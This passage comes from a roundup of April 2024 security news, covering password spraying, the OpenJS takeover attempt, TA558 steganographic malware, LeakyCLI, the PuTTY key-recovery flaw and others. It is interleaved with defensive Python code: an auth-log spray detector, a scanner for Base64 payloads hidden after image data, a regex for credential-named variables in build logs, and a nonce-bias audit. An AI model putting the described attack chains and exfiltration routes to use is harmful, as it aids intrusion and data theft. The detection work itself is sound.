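            reasons.append(f"{len(rec['users'])} distinct usernames")
        if reasons:
            findings.append({"ip": ip, "anonymizer": ip in ANONYMIZER_IPS,
                             "valid_user_attempts": rec["valid"], "reasons": reasons})
    return sorted(findings, key=lambda f: f["ip"])


# Constructed auth log: generic-name spraying from a Tor exit, a short run against
# three real accounts from a clean address, and one user mistyping a password.
SAMPLE_AUTH_LOG = [
    "Mar 19 02:11:01 vpn-gw sshd[4121]: Failed password for invalid user admin from 203.0.113.10 port 51022 ssh2",
    "Mar 19 02:11:03 vpn-gw sshd[4122]: Failed password for invalid user test from 203.0.113.10 port 51023 ssh2",
    "Mar 19 02:11:05 vpn-gw sshd[4123]: Failed password for root from 203.0.113.10 port 51024 ssh2",
    "Mar 19 02:11:08 vpn-gw sshd[4124]: Failed password for invalid user guest from 203.0.113.10 port 51025 ssh2",
    "Mar 19 02:11:10 vpn-gw sshd[4125]: Failed password for invalid user ubnt from 203.0.113.10 port 51026 ssh2",
    "Mar 19 02:11:12 vpn-gw sshd[4126]: Failed password for root from 203.0.113.10 port 51027 ssh2",
    "Mar 19 02:15:40 vpn-gw sshd[4188]: Failed password for alice from 198.51.100.20 port 40001 ssh2",
    "Mar 19 02:15:44 vpn-gw sshd[4189]: Failed password for bob from 198.51.100.20 port 40002 ssh2",
    "Mar 19 02:15:49 vpn-gw sshd[4190]: Failed password for carol from 198.51.100.20 port 40003 ssh2",
    "Mar 19 02:20:02 vpn-gw sshd[4201]: Failed password for alice from 10.1.2.3 port 60012 ssh2",
    "Mar 19 02:20:05 vpn-gw sshd[4201]: Accepted password for alice from 10.1.2.3 port 60012 ssh2",
]

if __name__ == "__main__":
    for f in flag_sources(SAMPLE_AUTH_LOG):
        print(f)
```

The second source never trips the failure-count threshold but still gets flagged: three real usernames in ten seconds from one address is the "valid usernames for specific organizations" pattern, and it is the one that precedes lockouts. On VPN appliances the equivalent fields come from the vendor's authentication log rather than sshd, but the per-source grouping and the real-versus-generic split carry over unchanged.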
The development comes as the networking equipment major warned of password spray attacks targeting remote access VPN services as part of what it said are "reconnaissance efforts."
It also follows a report from Fortinet FortiGuard Labs that threat actors are continuing to exploit a now-patched security flaw impacting TP-Link Archer AX21 routers (CVE-2023-1389, CVSS score: 8.8) to deliver DDoS botnet malware families like AGoent, Condi, Gafgyt, Mirai, Miori, and MooBot.
"As usual, botnets relentlessly target IoT vulnerabilities, continuously attempting to exploit them," security researchers Cara Lin and Vincent Li said.
"Users should be vigilant against DDoS botnets and promptly apply patches to safeguard their network environments from infection, preventing them from becoming bots for malicious threat actors."
OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt
16.4.24
Security
The Hacker News
Security researchers have uncovered a "credible" takeover attempt targeting the OpenJS Foundation in a manner that evokes similarities to the recently uncovered incident aimed at the open-source XZ Utils project.
"The OpenJS Foundation Cross Project Council received a suspicious series of emails with similar messages, bearing different names and overlapping GitHub-associated emails," OpenJS Foundation and Open Source Security Foundation (OpenSSF) said in a joint alert.
According to Robin Bender Ginn, executive director of OpenJS Foundation, and Omkhar Arasaratnam, general manager at OpenSSF, the email messages urged OpenJS to take action to update one of its popular JavaScript projects to remediate critical vulnerabilities without providing any specifics.
The email author(s) also called on OpenJS to designate them as a new maintainer of the project despite having little prior involvement. Two other popular JavaScript projects not hosted by OpenJS are also said to have been at the receiving end of similar activity.
That said, none of the people who contacted OpenJS were granted privileged access to the OpenJS-hosted project.
The incident brings into sharp focus the method by which the lone maintainer of XZ Utils was targeted by fictitious personas that were expressly created for what's believed to be a social engineering-cum-pressure campaign designed to make Jia Tan (aka JiaT75) a co-maintainer of the project.
This has raised the possibility that the attempt to sabotage XZ Utils may not be an isolated incident and that it's part of a broader campaign to undermine the security of various projects, the two open source groups said. The names of the JavaScript projects were not disclosed.
Jia Tan, as it stands, has no other digital footprints outside of their contributions, indicating that the account was invented for the sole purpose of building credibility within the open-source development community over years and ultimately pushing a stealthy backdoor into XZ Utils.
It also serves to pinpoint the sophistication and patience that has gone behind planning and executing the campaign by targeting an open-source, volunteer-run project that's used in many Linux distributions, putting organizations and users at risk of supply chain attacks.
The XZ Utils backdoor incident also highlights the "fragility" of the open-source ecosystem and the risks created by maintainer burnout, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said last week.
"The burden of security shouldn't fall on an individual open-source maintainer — as it did in this case to near-disastrous effect," CISA officials Jack Cable and Aeva Black said.
"Every technology manufacturer that profits from open source software must do their part by being responsible consumers of and sustainable contributors to the open source packages they depend on."
The agency is recommending that technology manufacturers and system operators that incorporate open-source components should either directly audit the source code periodically, or support the maintainers in doing so, with the aim of eliminating entire classes of vulnerabilities and implementing other secure by design principles.
"These social engineering attacks are exploiting the sense of duty that maintainers have with their project and community in order to manipulate them," Bender Ginn and Arasaratnam said.
"Pay attention to how interactions make you feel. Interactions that create self-doubt, feelings of inadequacy, of not doing enough for the project, etc. might be part of a social engineering attack."
TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks
16.4.24
Virus
The Hacker News
The threat actor tracked as TA558 has been observed leveraging steganography as an obfuscation technique to deliver a wide range of malware such as Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm, among others.
"The group made extensive use of steganography by sending VBSs, PowerShell code, as well as RTF documents with an embedded exploit, inside images and text files," Russian cybersecurity company Positive Technologies said in a Monday report.
The campaign has been codenamed SteganoAmor for its reliance on steganography and the choice of file names such as greatloverstory.vbs and easytolove.vbs.
A majority of the attacks have targeted industrial, services, public, electric power, and construction sectors in Latin American countries, although companies located in Russia, Romania, and Turkey have also been singled out.
The development comes as TA558 has also been spotted deploying Venom RAT via phishing attacks aimed at enterprises located in Spain, Mexico, the United States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.
It all starts with a phishing email containing a booby-trapped Microsoft Excel attachment that exploits a now-patched security flaw in Equation Editor (CVE-2017-11882) to download a Visual Basic Script that, in turn, fetches the next-stage payload from paste[.]ee.
The obfuscated malicious code takes care of downloading two images from an external URL that come embedded with a Base64-encoded component that ultimately retrieves and executes the Agent Tesla malware on the compromised host.
Beyond Agent Tesla, other variants of the attack chain have led to an assortment of malware such as FormBook, GuLoader, LokiBot, Remcos RAT, Snake Keylogger, and XWorm, which are designed for remote access, data theft, and delivery of secondary payloads.
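An image that carries a Base64 blob can be checked without any image library: a well-formed JPEG ends at its EOI marker and a PNG at its IEND chunk, so anything after that point is foreign, and a long run of Base64 alphabet there is a strong signal. The following is an added example written for this page, not Positive Technologies' tooling; the report does not say where inside the image TA558 placed the data, so placement after the end marker is an assumption, and the images and payload are constructed byte strings.

```python
import base64
import binascii
import re
import string

JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"
PNG_SIG = b"\x89PNG\r\n\x1a\n"
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")   # 40+ Base64 chars, optional padding


def trailing_bytes(img: bytes) -> bytes:
    """Return whatever follows the image's end marker: JPEG EOI (FFD9) or the PNG
    IEND chunk plus its 4-byte CRC. Empty when the file ends where it should.
    Uses the last EOI so an embedded EXIF thumbnail's EOI is not mistaken for it."""
    if img.startswith(JPEG_SOI):
        end = img.rfind(JPEG_EOI)
        return b"" if end < 0 else img[end + 2:]
    if img.startswith(PNG_SIG):
        end = img.find(b"IEND")
        return b"" if end < 0 else img[end + 8:]
    return b""


def classify(blob: bytes) -> str:
    if blob.startswith(b"MZ"):
        return "pe"
    if all(ch in string.printable for ch in blob.decode("latin-1")):
        return "script-or-text"
    return "binary"


def extract_payloads(img: bytes):
    """Decode every Base64 run found after the image data and classify it."""
    found = []
    for m in B64_RUN.finditer(trailing_bytes(img)):
        chunk = m.group(0)
        try:
            blob = base64.b64decode(chunk + b"=" * (-len(chunk) % 4), validate=True)
        except binascii.Error:
            continue
        found.append({"kind": classify(blob), "data": blob, "b64_len": len(chunk)})
    return found


def build_samples():
    """Constructed inputs: a minimal clean JPEG, the same JPEG with a Base64-encoded
    fake PE appended, and a minimal clean PNG."""
    payload = b"MZ\x90\x00" + b"\x00" * 28 + b"CONSTRUCTED LOADER STUB"
    clean_jpeg = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 24 + JPEG_EOI
    stego_jpeg = clean_jpeg + b"\r\n" + base64.b64encode(payload)
    clean_png = PNG_SIG + b"\x00\x00\x00\x00IEND\xaeB`\x82"
    return clean_jpeg, stego_jpeg, clean_png


if __name__ == "__main__":
    for name, img in zip(("clean.jpg", "stego.jpg", "clean.png"), build_samples()):
        for p in extract_payloads(img):
            print(name, p["kind"], p["b64_len"], "base64 chars ->", len(p["data"]), "bytes")
```

The check generalizes to any format with a definite end marker; for a mail gateway or sandbox the useful output is the decoded blob's type, since a "pe" verdict on an image attachment is actionable on its own. Data hidden inside the pixel data or in metadata chunks needs a different approach and will not be caught by this trailing-bytes check.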
The phishing emails are sent from legitimate-but-compromised SMTP servers to lend the messages a little credibility and minimize the chances of them getting blocked by email gateways. In addition, TA558 has been found to use infected FTP servers to stage the stolen data.
The disclosure comes against the backdrop of a series of phishing attacks targeting government organizations in Russia, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia with a malware dubbed LazyStealer to harvest credentials from Google Chrome.
Positive Technologies is tracking the activity cluster under the name Lazy Koala in reference to the name of the user (joekoala), who is said to control the Telegram bots that receive the stolen data.
That said, the victim geography and the malware artifacts indicate potential links to another hacking group tracked by Cisco Talos under the name YoroTrooper (aka SturgeonPhisher).
"The group's main tool is a primitive stealer, whose protection helps to evade detection, slow down analysis, grab all the stolen data, and send it to Telegram, which has been gaining popularity with malicious actors by the year," security researcher Vladislav Lunin said.
The findings also follow a wave of social engineering campaigns that are designed to propagate malware families like FatalRAT and SolarMarker.
AWS, Google, and Azure CLI Tools Could Leak Credentials in Build Logs
16.4.24
Security
The Hacker News
New cybersecurity research has found that command-line interface (CLI) tools from Amazon Web Services (AWS) and Google Cloud can expose sensitive credentials in build logs, posing significant risks to organizations.
The vulnerability has been codenamed LeakyCLI by cloud security firm Orca.
"Some commands on Azure CLI, AWS CLI, and Google Cloud CLI can expose sensitive information in the form of environment variables, which can be collected by adversaries when published by tools such as GitHub Actions," security researcher Roi Nisimi said in a report shared with The Hacker News.
Microsoft has since addressed the Azure CLI side of the issue as part of security updates released in November 2023, assigning it the CVE identifier CVE-2023-36052 (CVSS score: 8.6).
The issue, in a nutshell, is that certain CLI commands print (pre-)defined environment variables to standard output, and that output is captured in Continuous Integration and Continuous Deployment (CI/CD) logs. The commands identified across AWS and Google Cloud are listed below -
aws lambda get-function-configuration
aws lambda get-function
aws lambda update-function-configuration
aws lambda update-function-code
aws lambda publish-version
gcloud functions deploy <func> --set-env-vars
gcloud functions deploy <func> --update-env-vars
gcloud functions deploy <func> --remove-env-vars
Orca said it found several projects on GitHub that inadvertently leaked access tokens and other sensitive data via Github Actions, CircleCI, TravisCI, and Cloud Build logs.
Unlike Microsoft, however, both Amazon and Google consider this to be expected behavior, requiring that organizations take steps to avoid storing secrets in environment variables and instead use a dedicated secrets store service like AWS Secrets Manager or Google Cloud Secret Manager.
Google also recommends the use of the "--no-user-output-enabled" option to suppress the printing of command output to standard output and standard error in the terminal.
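The exposure described above is easy to reproduce in a pipeline: the JSON that `aws lambda get-function-configuration` prints carries the function's whole `Environment.Variables` block, and a CI runner only masks values it was explicitly told about. The following is an added example (not Orca's tooling or either vendor's code) of two defensive checks a pipeline owner can run: redacting the environment block before the output is logged, and scanning a finished build log for secret-looking keys that slipped through. The CLI output and the build log are constructed samples shaped like the real command's JSON; the key-name heuristic is an assumption, not a vendor rule.

```python
"""Defensive helpers for the LeakyCLI issue: CLI commands that echo a
function's environment block into CI/CD logs.  Added example, not code
from Orca, AWS, or Google."""
import json
import re

# Constructed sample shaped like `aws lambda get-function-configuration`
# output.  Every value here is a fake placeholder.
SAMPLE_CLI_OUTPUT = json.dumps({
    "FunctionName": "orders-api",
    "Runtime": "python3.12",
    "Environment": {
        "Variables": {
            "DB_PASSWORD": "hunter2-EXAMPLE",
            "STRIPE_API_KEY": "sk_test_EXAMPLEKEY",
            "LOG_LEVEL": "info",
        }
    },
}, indent=2)

# Constructed build-log excerpt: the runner echoes the command, then the
# CLI prints its JSON verbatim into the job output.
SAMPLE_BUILD_LOG = (
    "Run aws lambda get-function-configuration --function-name orders-api\n"
    + SAMPLE_CLI_OUTPUT
)

# Heuristic (assumption): variable names that usually hold credentials.
SENSITIVE_KEY = re.compile(
    r"(PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY|CREDENTIAL)", re.I)


def redact_environment(cli_json: str) -> str:
    """Return the CLI JSON with every Environment.Variables value masked,
    so the remaining fields can still be logged for debugging."""
    doc = json.loads(cli_json)
    env = doc.get("Environment", {}).get("Variables")
    if isinstance(env, dict):
        for name in env:
            env[name] = "***REDACTED***"
    return json.dumps(doc, indent=2)


def suspicious_keys(cli_json: str) -> list[str]:
    """Names of environment variables whose *name* suggests a secret; these
    belong in a secrets manager, not in the function configuration."""
    doc = json.loads(cli_json)
    env = doc.get("Environment", {}).get("Variables", {})
    return sorted(k for k in env if SENSITIVE_KEY.search(k))


def scan_build_log(log_text: str) -> list[tuple[int, str]]:
    """Scan a CI build log for lines that look like a leaked env block: a
    JSON key with a secret-looking name followed by a non-masked value.
    Returns (line_number, key) pairs for triage."""
    kv = re.compile(r'"([A-Za-z0-9_]+)":\s*"([^"]+)"')
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for key, value in kv.findall(line):
            if SENSITIVE_KEY.search(key) and value != "***REDACTED***":
                hits.append((lineno, key))
    return hits


if __name__ == "__main__":
    print("secret-looking variables:", suspicious_keys(SAMPLE_CLI_OUTPUT))
    print("leaks in build log:", scan_build_log(SAMPLE_BUILD_LOG))
    print(redact_environment(SAMPLE_CLI_OUTPUT))
```

Piping CLI output through `redact_environment` before it reaches the job log removes the values but keeps the structure, and `suspicious_keys` is the more durable fix: anything it reports should be moved to AWS Secrets Manager or Google Cloud Secret Manager and read at runtime, as both vendors recommend, so there is nothing for the CLI to print.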
"If bad actors get their hands on these environment variables, this could potentially lead to view sensitive information including credentials, such as passwords, user names, and keys, which could allow them to access any resources that the repository owners can," Nisimi said.
"CLI commands are by default assumed to be running in a secure environment, but coupled with CI/CD pipelines, they may pose a security threat."
Widely-Used PuTTY SSH Client Found Vulnerable to Key Recovery Attack
16.4.24
Vulnerability
The Hacker News
The maintainers of the PuTTY Secure
Shell (SSH) and Telnet client are alerting users of a critical vulnerability
impacting versions from 0.68 through 0.80 that could be exploited to achieve
full recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys.
The flaw has been assigned the CVE identifier CVE-2024-31497, with the discovery credited to researchers Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum.
"The effect of the vulnerability is to compromise the private key," the PuTTY project said in an advisory.
"An attacker in possession of a few dozen signed messages and the public key has enough information to recover the private key, and then forge signatures as if they were from you, allowing them to (for instance) log in to any servers you use that key for."
However, in order to obtain the signatures, an attacker will have to compromise a server that the key is used to authenticate to.
In a message posted on the Open Source Software Security (oss-sec) mailing list, Bäumer described the flaw as stemming from the generation of biased ECDSA cryptographic nonces, which could enable the recovery of the private key.
"The first 9 bits of each ECDSA nonce are zero," Bäumer explained. "This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques."
"These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents."
Besides impacting PuTTY, it also affects other products that incorporate a vulnerable version of the software -
FileZilla (3.24.1 - 3.66.5)
WinSCP (5.9.5 - 6.3.2)
TortoiseGit (2.4.0.2 - 2.15.0)
TortoiseSVN (1.10.0 - 1.14.6)
Following responsible disclosure,
the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and
TortoiseGit 2.15.0.1. Users of TortoiseSVN are recommended to use Plink from the
latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch
becomes available.
Specifically, it has been resolved by switching to the RFC 6979 technique for all DSA and ECDSA key types, abandoning its earlier method of deriving the nonce using a deterministic approach that, while avoiding the need for a source of high-quality randomness, was susceptible to biased nonces when using P-521.
On top of that, ECDSA NIST-P521 keys used with any of the vulnerable components should be considered compromised and consequently revoked by removing them from authorized_keys files and their equivalents in other SSH servers.
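The bias Bäumer describes is a property of the nonce derivation, not of the curve, so it can be audited directly: derive nonces for a batch of messages and check how many top bits are zero in all of them. The block below is an added example, not PuTTY's code. It assumes that the flawed derivation behaves like a 512-bit hash reduced mod the 521-bit group order (which leaves exactly the 9 zero bits the advisory reports; the page does not describe PuTTY's internals beyond that), implements RFC 6979 section 3.2 with SHA-512 as the replacement the fix switched to, and uses a constructed private key that is not a real one.

```python
"""Audit helper for ECDSA nonce bias of the kind fixed in PuTTY 0.81.
Added example, not PuTTY's code.  Compares two deterministic nonce
derivations for NIST P-521 and measures their leading-zero bias."""
import hashlib
import hmac

# Order q of the NIST P-521 base point (FIPS 186-4); 521 bits long.
P521_Q = int(
    "01FF" + "FFFFFFFF" * 7 + "FFFFFFFA"
    "51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409", 16)
QLEN = P521_Q.bit_length()          # 521
RLEN = (QLEN + 7) // 8 * 8          # 528 bits = 66 bytes (RFC 6979 rlen)

# Constructed test key (not a real key): any integer in [1, q-1].
SAMPLE_PRIV = int.from_bytes(
    hashlib.sha512(b"constructed test key, not a real key").digest(), "big") % P521_Q


def biased_nonce(priv: int, msg: bytes) -> int:
    """Assumed model of the flawed scheme: a 512-bit hash reduced mod q.
    Because q has 521 bits the reduction is a no-op, so every nonce has
    at least 9 leading zero bits."""
    h = hashlib.sha512(priv.to_bytes(66, "big") + msg).digest()
    return int.from_bytes(h, "big") % P521_Q


def _bits2int(b: bytes) -> int:
    """RFC 6979 bits2int: keep the leftmost qlen bits."""
    v = int.from_bytes(b, "big")
    blen = len(b) * 8
    return v >> (blen - QLEN) if blen > QLEN else v


def _int2octets(x: int) -> bytes:
    """RFC 6979 int2octets: fixed rlen-bit big-endian encoding."""
    return x.to_bytes(RLEN // 8, "big")


def _bits2octets(b: bytes) -> bytes:
    """RFC 6979 bits2octets: bits2int, reduce mod q, then int2octets."""
    return _int2octets(_bits2int(b) % P521_Q)


def rfc6979_nonce(priv: int, msg: bytes) -> int:
    """Deterministic k per RFC 6979 section 3.2 using HMAC-SHA512."""
    h1 = hashlib.sha512(msg).digest()
    hlen = len(h1)
    V = b"\x01" * hlen
    K = b"\x00" * hlen
    seed = _int2octets(priv) + _bits2octets(h1)
    K = hmac.new(K, V + b"\x00" + seed, "sha512").digest()
    V = hmac.new(K, V, "sha512").digest()
    K = hmac.new(K, V + b"\x01" + seed, "sha512").digest()
    V = hmac.new(K, V, "sha512").digest()
    while True:
        T = b""
        while len(T) * 8 < QLEN:
            V = hmac.new(K, V, "sha512").digest()
            T += V
        k = _bits2int(T)
        if 1 <= k < P521_Q:
            return k
        # Out of range: stir the state and try again (rare for P-521).
        K = hmac.new(K, V + b"\x00", "sha512").digest()
        V = hmac.new(K, V, "sha512").digest()


def leading_zero_bias(nonce_fn, priv: int, n_msgs: int = 60) -> int:
    """Number of top bits that are zero in *every* nonce derived for
    n_msgs distinct messages.  A sound generator reports 0; the flawed
    P-521 derivation reports 9, matching the advisory's '60 signatures'
    observation window."""
    widest = max(nonce_fn(priv, b"message %d" % i).bit_length()
                 for i in range(n_msgs))
    return QLEN - widest


if __name__ == "__main__":
    print("biased scheme :", leading_zero_bias(biased_nonce, SAMPLE_PRIV), "fixed zero bits")
    print("RFC 6979      :", leading_zero_bias(rfc6979_nonce, SAMPLE_PRIV), "fixed zero bits")
```

The audit needs only the generator and a handful of messages, so it can be run against any deterministic-nonce implementation before it ships; a non-zero result on a curve whose order is wider than the hash output is exactly the condition this advisory describes.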
Hive RAT Creators and $3.5M Cryptojacking Mastermind Arrested in Global Crackdown
16.4.24
Virus
The Hacker News
Two individuals have been arrested
in Australia and the U.S. in connection with an alleged scheme to develop and
distribute a remote access trojan called Hive RAT (previously Firebird).
The U.S. Justice Department (DoJ) said the malware "gave the malware purchasers control over victim computers and enabled them to access victims' private communications, their login credentials, and other personal information."
A 24-year-old individual named Edmond Chakhmakhchyan (aka "Corruption") from Van Nuys in Los Angeles, California, was taken into custody after he was caught selling a license of Hive RAT to an undercover employee of a law enforcement agency.
He has been charged with one count of conspiracy and one count of advertising a device as an interception device, each of which carries a penalty of five years in prison. Chakhmakhchyan pleaded not guilty and was ordered to stand trial on June 4, 2024.
Court documents allege a partnership between the malware's creator and the defendant under which the latter would post advertisements for the malware on a cybercrime forum called Hack Forums, accept cryptocurrency payments from customers, and offer product support.
Hive RAT comes with capabilities to terminate programs, browse files, record keystrokes, access incoming and outgoing communications, and steal victim passwords and other credentials for bank accounts and cryptocurrency wallets from victims' machines without their knowledge or consent.
"Chakhmakhchyan exchanged electronic messages with purchasers and explained to one buyer that the malware 'allowed the Hive RAT user to access another person's computer without that person knowing about the access,'" the DoJ said.
The Australian Federal Police (AFP), which announced charges of its own against a citizen for their purported involvement in the creation and sale of Hive RAT, said its investigation into the matter began in 2020.
The unnamed suspect faces 12 charges, including one count of producing data with intent to commit a computer offense, one count of controlling data with intent to commit a computer offense, and 10 counts of supplying data with intent to commit a computer offense. The maximum penalty for each of these offenses is three years imprisonment.
"Remote Access Trojans are one of the most harmful cyber threats in the online environment – once installed onto a device, a RAT can provide criminals with full access to, and control of the device," AFP Acting Commander Cybercrime Sue Evans said.
"This could include anything from committing crimes anonymously, watching victims through camera devices, wiping hard drives, or stealing banking credentials and other sensitive information."
Nebraska Man Indicted in Cryptojacking Scheme#
The development comes as
federal prosecutors in the U.S. indicted Charles O. Parks III (aka "CP3O"), 45,
for operating a massive illegal cryptojacking operation, defrauding "two
well-known providers of cloud computing services" out of more than $3.5 million
in computing resources to mine cryptocurrency worth nearly $1 million.
The indictment charges Parks with wire fraud, money laundering, and engaging in unlawful monetary transactions. He was arrested on April 13, 2024. The wire fraud and money laundering charges carry a maximum sentence of 20 years' imprisonment. He also faces up to 10 years' imprisonment on the unlawful monetary transactions charges.
While the DoJ does not explicitly state what cloud providers were targeted in the fraudulent operation, it noted that the companies are based in the Washington state cities of Seattle and Redmond – the corporate headquarters for Amazon and Microsoft.
"From in or about January 2021 through August 2021, Parks created and used a variety of names, corporate affiliations and email addresses, including emails with domains from corporate entities he operated [...] to register numerous accounts with the cloud providers and to gain access to massive amounts of computing processing power and storage that he did not pay for," the DoJ said.
The illicitly obtained resources were then used to mine cryptocurrencies such as Ether (ETH), Litecoin (LTC) and Monero (XMR), which were laundered through a network of cryptocurrency exchanges, a non-fungible token (NFT) marketplace, an online payment provider, and traditional bank accounts to conceal the digital transaction trail.
The ill-gotten proceeds, prosecutors said, were ultimately converted into dollars, which Parks used to make various extravagant purchases that included a Mercedes Benz luxury car, jewelry, and first-class hotel and travel expenses.
"Parks tricked the providers into approving heightened privileges and benefits, including elevated levels of cloud computing services and deferred billing accommodations, and deflected inquiries from the providers regarding questionable data usage and mounting unpaid subscription balances," the DoJ said.
FTC Fines Mental Health Startup Cerebral $7 Million for Major Privacy Violations
16.4.24
BigBrothers
The Hacker News
The U.S. Federal Trade Commission
(FTC) has barred the mental telehealth company Cerebral from using or
disclosing personal data for advertising purposes.
It has also been fined more than $7 million over charges that it revealed users' sensitive personal health information and other data to third parties for advertising purposes and failed to honor its easy cancellation policies.
"Cerebral and its former CEO, Kyle Robertson, repeatedly broke their privacy promises to consumers and misled them about the company's cancellation policies," the FTC said in a press statement.
While claiming to offer "safe, secure, and discreet" services in order to get consumers to sign up and provide their data, the company, the FTC alleged, did not clearly disclose that the information would be shared with third parties for advertising.
The agency also accused the company of burying its data sharing practices in dense privacy policies, with the company engaging in deceptive practices by claiming that it would not share users' data without their consent.
The company is said to have provided the sensitive information of nearly 3.2 million consumers to third parties such as LinkedIn, Snapchat, and TikTok by integrating tracking tools within its websites and apps that are designed to provide advertising and data analytics functions.
The information included names; medical and prescription histories; home and email addresses; phone numbers; birthdates; demographic information; IP addresses; pharmacy and health insurance information; and other health information.
The FTC complaint further accused Cerebral of failing to enforce adequate security guardrails by allowing former employees to access users' medical records from May to December 2021, using insecure access methods that exposed patient information, and not restricting access to consumer data to only those employees who needed it.
"Cerebral sent out promotional postcards, which were not in envelopes, to over 6,000 patients that included their names and language that appeared to reveal their diagnosis and treatment to anyone who saw the postcards," the FTC said.
Pursuant to the proposed order, which is pending approval from a federal court, the company has been barred from using or disclosing consumers' personal and health information to third parties for marketing, and has been ordered to implement a comprehensive privacy and data security program.
Cerebral has also been asked to post a notice on its website alerting users of the FTC order, as well as adopt a data retention schedule and delete most consumer data not used for treatment, payment, or health care operations unless they have consented to it. It's also required to provide a mechanism for users to get their data deleted.
The development comes days after the FTC prohibited alcohol addiction treatment firm Monument from disclosing health information to third-party platforms for advertising without users' permission, after the company had shared such data with Google and Meta between 2020 and 2022 despite claiming it would be "100% confidential."
The New York-based company has been ordered to notify users about the disclosure of their health information to third parties and ensure that all the shared data has been deleted.
"Monument failed to ensure it was complying with its promises and in fact disclosed users' health information to third-party advertising platforms, including highly sensitive data that revealed that its customers were receiving help to recover from their addiction to alcohol," FTC said.
Over the past year, FTC has announced similar enforcement actions against healthcare service providers like BetterHelp, GoodRx, and Premom for sharing users' data with third-party analytics and social media firms without their consent.
It also warned [PDF] Amazon against using patient data for marketing purposes after it finalized a $3.9 billion acquisition of membership-based primary care practice One Medical.
Intel and Lenovo BMCs Contain Unpatched Lighttpd Server Flaw
16.4.24
Vulnerability
The Hacker News
A security flaw impacting the
Lighttpd web server used in baseboard management controllers (BMCs) has remained
unpatched by device vendors like Intel and Lenovo, new findings from Binarly
reveal.
While the original shortcoming was discovered and patched by the Lighttpd maintainers way back in August 2018 with version 1.4.51, the lack of a CVE identifier or an advisory meant that it was overlooked by developers of AMI MegaRAC BMC, ultimately ending up in products made by Intel and Lenovo.
Lighttpd (pronounced "Lighty") is an open-source, high-performance web server designed for speed, security, and flexibility, optimized for demanding environments while consuming few system resources.
The silent fix for Lighttpd concerns an out-of-bounds read vulnerability that could be exploited to exfiltrate sensitive data, such as process memory addresses, thereby allowing threat actors to bypass crucial security mechanisms like address space layout randomization (ASLR).
"The absence of prompt and important information about security fixes prevents proper handling of these fixes down both the firmware and software supply chains," the firmware security company said.
The flaws are described below -
Out-of-bounds read in Lighttpd 1.4.45 used in Intel M70KLP series firmware
Out-of-bounds read in Lighttpd 1.4.35 used in Lenovo BMC firmware
Out-of-bounds read in Lighttpd before 1.4.51
Intel and Lenovo have opted not
to address the issue as the products incorporating the susceptible version of
Lighttpd have hit end-of-life (EoL) status and are no longer eligible for
security updates, effectively turning it into a forever-day bug.
The disclosure highlights how the presence of outdated third-party components in
the latest version of firmware can traverse the supply chain and pose unintended
security risks for end users.
"This is yet another vulnerability that will remain unfixed forever in some products and will present high-impact risk to the industry for a very long time," Binarly added.
Muddled Libra Shifts Focus to SaaS and Cloud for Extortion and Data Theft Attacks
16.4.24
APT
The Hacker News
The threat actor known as Muddled
Libra has been observed actively targeting software-as-a-service (SaaS)
applications and cloud service provider (CSP) environments in a bid to
exfiltrate sensitive data.
"Organizations often store a variety of data in SaaS applications and use services from CSPs," Palo Alto Networks Unit 42 said in a report published last week.
"The threat actors have begun attempting to leverage some of this data to assist with their attack progression, and to use for extortion when trying to monetize their work."
Muddled Libra, also called Starfraud, UNC3944, Scatter Swine, and Scattered Spider, is a notorious cybercriminal group that has leveraged sophisticated social engineering techniques to gain initial access to target networks.
"Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs," the U.S. government said in an advisory late last year.
The attackers also have a history of monetizing access to victim networks in numerous ways, including extortion enabled by ransomware and data theft.
Unit 42 previously told The Hacker News that the moniker "Muddled Libra" comes from the "confusing muddled landscape" associated with the 0ktapus phishing kit, which has been put to use by other threat actors to stage credential harvesting attacks.
A key aspect of the threat actor's tactical evolution is the use of reconnaissance techniques to identify administrative users to target when posing as helpdesk staff using phone calls to obtain their passwords.
The recon phase also extends to Muddled Libra carrying out extensive research to find information about the applications and the cloud service providers used by the target organizations.
"The Okta cross-tenant impersonation attacks that occurred from late July to early August 2023, where Muddled Libra bypassed IAM restrictions, display how the group exploits Okta to access SaaS applications and an organization's various CSP environments," security researcher Margaret Zimmermann explained.
The information obtained at this stage serves as a stepping stone for conducting
lateral movement, abusing the admin credentials to access single sign-on (SSO)
portals to gain quick access to SaaS applications and cloud infrastructure.
In the event SSO is not integrated into a target's CSP, Muddled Libra undertakes broad discovery activities to uncover the CSP credentials, likely stored in unsecured locations, to meet their objectives.
Data stored in SaaS applications is also used to glean specifics about the compromised environment, capturing as many credentials as possible to widen the scope of the breach via privilege escalation and lateral movement.
"A large portion of Muddled Libra's campaigns involve gathering intelligence and data," Zimmermann said.
"Attackers then use this to generate new vectors for lateral movement within an environment. Organizations store a variety of data within their unique CSP environments, thus making these centralized locations a prime target for Muddled Libra."
The discovery actions specifically single out Amazon Web Services (AWS) and Microsoft Azure, targeting services like AWS IAM, Amazon Simple Storage Service (S3), AWS Secrets Manager, Azure storage account access keys, Azure Blob Storage, and Azure Files to extract relevant data.
Data exfiltration is achieved by abusing legitimate CSP services and features. This encompasses tools like AWS DataSync, AWS Transfer, and a technique called snapshot, the latter of which makes it possible to move data out of an Azure environment by staging the stolen data in a virtual machine.
Muddled Libra's tactical shift requires organizations to secure their identity portals with robust secondary authentication protections like hardware tokens or biometrics.
